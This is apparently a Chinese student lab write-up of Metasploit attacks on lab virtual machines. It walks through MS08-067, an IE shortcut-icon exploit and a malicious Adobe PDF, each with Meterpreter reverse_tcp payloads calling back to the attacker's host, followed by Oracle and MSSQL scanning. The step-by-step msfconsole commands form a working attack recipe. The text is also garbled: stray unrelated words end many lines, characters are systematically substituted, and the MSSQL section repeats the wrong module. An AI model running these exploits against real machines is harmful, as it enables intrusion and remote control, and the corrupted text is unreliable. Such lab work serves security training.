1、实验内容sql
(1)一个主动攻击,如ms08_067;数据库
(2) 一个针对浏览器的攻击,如ms11_050;windows
(3)一个针对客户端的攻击,如Adobe;api
(4)成功应用任何一个辅助模块。浏览器
2、实验后问题回答安全
(1)用本身的话解释什么是exploit,payload,encode。服务器
Exploit就是漏洞利用,有exploit确定有漏洞,因此渗透攻击就是利用一个系统、应用或服务中的安全漏洞进行攻击;网络
Payload就是有效载荷,在渗透攻击后植入目标系统执行代码。session
Encode就是编码,经过改变特征码,对攻击载荷进行“免杀”处理。oracle
(2)离实战还缺些什么技术或步骤?
我以为离实战还远得很啊,一是靶机是很低很低的Windowsxp系统,浏览器IE版本也很低,在虚拟机上打开网页的时候都会提醒要更新了,实际上的电脑应该不会有这么低版本的,也看到有同窗利用了新的漏洞攻击了Windows7的系统,我也查找了一些其余的漏洞,仍是由于本身的技术过低没有完成。二是在攻击浏览器的时候,须要靶机访问生成的网址,实战中那么明显的IP网址通常不会轻易访问,仍是要进行假装。
3、实验体会
此次实验是使用漏洞攻击,真的是作的特别的艰难了,本身的垃圾电脑带不起来两个虚拟机,跟同窗合做用两台虚拟机常常ping不通(防火墙也关了,抓取ping包那个也设置了也不行),最后直接借了一台高配置的电脑完成一部分,心累啊~在实验中以为要注意一下:一是配置的时候经常使用show options看看配置有没有错,有时候晕了的时候会把攻击的IP和靶机的设置反了,或者是有端口号会变之类的问题;二是看看Linux和win虚拟机能不能ping通。
4、实践过程
(一)windows服务渗透攻击(MS08-067漏洞攻击)
1.使攻击机与靶机相互ping通,攻击机IP:10.1.1.242,靶机IP:10.1.1.236
2.启动msf终端。
使用search命令搜索该漏洞对应的模块:(能够看到漏洞的时间是2008年的)
启用该渗透攻击模块,选择运行后门回连控制端的攻击载荷,配置渗透攻击所需的配置项:
启用 :use exploit/windows/smb/ms08_067_netapi
设置渗透目标IP: set RHOST 10.1.1.236
设置攻击机端口: set LPORT 4319
设置攻击机IP: set LHOST 10.1.1.242
设置目标系统类型: set target 0
3.发起渗透攻击显示攻击成功后,在攻击机上执行ipconfig命令验证结果,能够执行:
(二)浏览器渗透攻击(ms10_046漏洞攻击)
1.启动msf终端,使用search命令搜索该漏洞对应的模块:
2. 启用该渗透攻击模块 use exploit/windows/browser/ms10_046_shortcut_icon_dlloader
选择运行后门回连控制端的攻击载荷,用 show payloads
设置攻击载荷为: set paylod windows/meterpreter/reverse_tcp
配置渗透攻击所需的配置项: show options
设置服务器地址: set SRVHOST 192.168.43.6
设置端口: set LPORT 4319
设置靶机IP: set LHOST 192.168.42.134
设置完成后键入 exploit 发起攻击:
上图我错误的设置了URIPATH为4319,应该为默认的“/”,修改后从新运行
生成一个URL 地址:http://192.168.43.6:80/
3.在靶机中启动IE浏览器,访问连接http://192.168.43.6:80/
在攻击机MSF终端中能够看到以下信息:
能够看到从靶机传来的不少数据。
而在靶机的网页上回生成两个文件:
4.使用sessions-l命令查看当前监听端的活动会话。
运行 sessions 命令,查看当前的会话信息
奇怪的是我查看了会话信息并无会话,可是以前明明收到来自靶机的信息,而后回到靶机上查看,发现是靶机卡住了,网页没有响应,而后个人整个电脑都卡住了,最后只能强制关机了,但已经能看到从靶机传回来的数据,因此算是成功了
(三)Adobe阅读器渗透攻击
1.使攻击机与靶机相互ping通,攻击机IP:10.1.1.242,靶机IP:10.1.1.190
2.启动msf终端。
配置渗透攻击所需的配置项:
设置载荷: set payload windows/meterpreter/reverse_tcp
设置攻击机IP: set LHOST 10.1.1.242
设置端口: set LPORT 8443
设置产生的文件: set FILENAME 4319.pdf
设置完成后键入 exploit :
3.根据路径找到该pdf文件放到靶机里。
4.使用命令 back 退出当前模块,启动一个对应于载荷的监听端,等待靶机回连,并执行 exploit :
5.在靶机中双击打开该文件,监听端接到来自靶机的Meterpreter链接,输入命令 sysinfo ,可对靶机环境进行基本的查询,攻击成功:
(四)Oracle数据库服务查点
各类网络数据库的网络服务端口是漏洞频发的“重灾区”,好比Microsoft SQL Server的1433端口(第五部分),以及Oracle SQL监听器(tnslsnr)使用的1521端口。可使用mssql_ping模块查找网络中的Microsoft SQL Server,使用tnslsnr_version模块查找网络中开放端口的Oracle监听器服务。
1.使用 use auxiliary/scanner/oracle/tnslsnr_version 模块查找网络中开发端口的Oracle监听器服务。
2.设置相关配置项:(先用 show options 查看要设置的内容)
设置扫描区段: set RHOST 172.30.4.0/24
设置线程: set THREADS 50
命令 run 开始扫描,扫描完成,但没有在网络中发现后台服务器上开放的Oracle数据库。
(五)mssql扫描
配置不当的MS SQL一般是进入目标系统的第一个后门。
MS SQL安装后,默认监听在TCP端口1433或使用随机的动态TCP端口。随机状况下,使用mssql_ping模块,获取随机的TCP端口。
当Metasploit发现MS SQL服务器后,他会将全部可以获取的关于服务器的信息都显示出来。
1.使用 use auxiliary/scanner/oracle/tnslsnr_version 模块
2.设置相关配置项:(先用 show options 查看要设置的内容)
设置扫描区段: set RHOST 172.30.4.0/24
设置线程: set THREADS 50
命令 run 开始扫描,扫描完成,也没有发现数据库。